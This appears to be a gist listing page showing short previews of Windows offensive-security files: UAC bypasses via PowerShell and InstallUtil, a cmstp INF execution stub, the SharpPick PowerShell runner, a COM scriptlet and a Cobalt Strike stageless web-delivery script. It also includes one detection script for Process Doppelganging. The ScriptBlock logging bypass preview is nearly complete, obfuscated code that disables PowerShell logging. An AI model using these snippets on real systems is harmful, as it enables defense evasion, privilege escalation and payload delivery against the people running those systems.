This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
;cmstp.exe /s cmstp.inf | |
[version] | |
Signature=$chicago$ | |
AdvancedINF=2.5 | |
[DefaultInstall_SingleUser] | |
UnRegisterOCXs=UnRegisterOCXSection | |
[UnRegisterOCXSection] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-Doppelgangers | |
{ | |
<# | |
.SYNOPSIS | |
Detects use of NTFS transactions for stealth/evasion, aka 'Process Doppelganging' | |
Author: Joe Desimone (@dez_) | |
License: BSD 3-Clause | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" ?> | |
<!-- Te.exe DataDrivenTest.wsc --> | |
<!-- C:\Program Files (x86)\Windows Kits\10\Testing\Runtimes\TAEF > ./TE.exe DataDrivenTest.wsc --> | |
<!-- Test Authoring and Execution Framework v5.8k for x64 --> | |
<!-- StartGroup: VBSampleTests::TestOne --> | |
<!-- Calling TestOne --> | |
<!-- EndGroup: VBSampleTests::TestOne [Passed] --> | |
<!-- Summary: Total=1, Passed=1, Failed=0, Blocked=0, Not Run=0, Skipped=0 --> | |
<?component error="true" debug="true"?> | |
<package> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* SharpPick aka InexorablePoSH | |
* Description: Application to load and run powershell code via the .NET assemblies | |
* License: 3-Clause BSD License. See Veil PowerTools Project | |
* | |
* This application is part of Veil PowerTools, a collection of offensive PowerShell | |
* capabilities. Hope they help! | |
* | |
* This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Text; | |
using System.Security.Principal; | |
using System.Runtime.InteropServices; | |
using Microsoft.Win32; | |
namespace lsautil | |
{ | |
// https://msdn.microsoft.com/en-us/library/microsoft.win32.registry(v=vs.110).aspx |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Powershell script to bypass UAC on Vista+ assuming | |
# there exists one elevated process on the same desktop. | |
# Technical details in: | |
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html | |
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html | |
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html | |
# You need to Install-Module NtObjectManager for this to run. | |
Import-Module NtObjectManager |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# ScriptBlock Logging Bypass | |
# @cobbr_io | |
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static') | |
If ($GroupPolicyField) { | |
$GroupPolicyCache = $GroupPolicyField.GetValue($null) | |
If ($GroupPolicyCache['ScriptB'+'lockLogging']) { | |
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0 | |
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0 | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-8"?> | |
<package> | |
<component | |
id="dummy"> | |
<registration | |
description="dummy" | |
progid="dummy" | |
version="1.00" | |
remotable="True"> | |
<script |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Linq; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
using Microsoft.Win32; | |
/* | |
InstallUtil.exe C# version of Event Viewer UAC bypass |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Python Stageless Scripted Web Delivery | |
# setup our stageless Python Web Delivery attack | |
sub setup_attack { | |
local('%options $x86payload $x64payload $url $script'); | |
%options = $3; | |
# generate our stageless x86 payload | |
artifact_stageless(%options["listener"], "raw", "x86", $null, $this); | |
yield; |
NewerOlder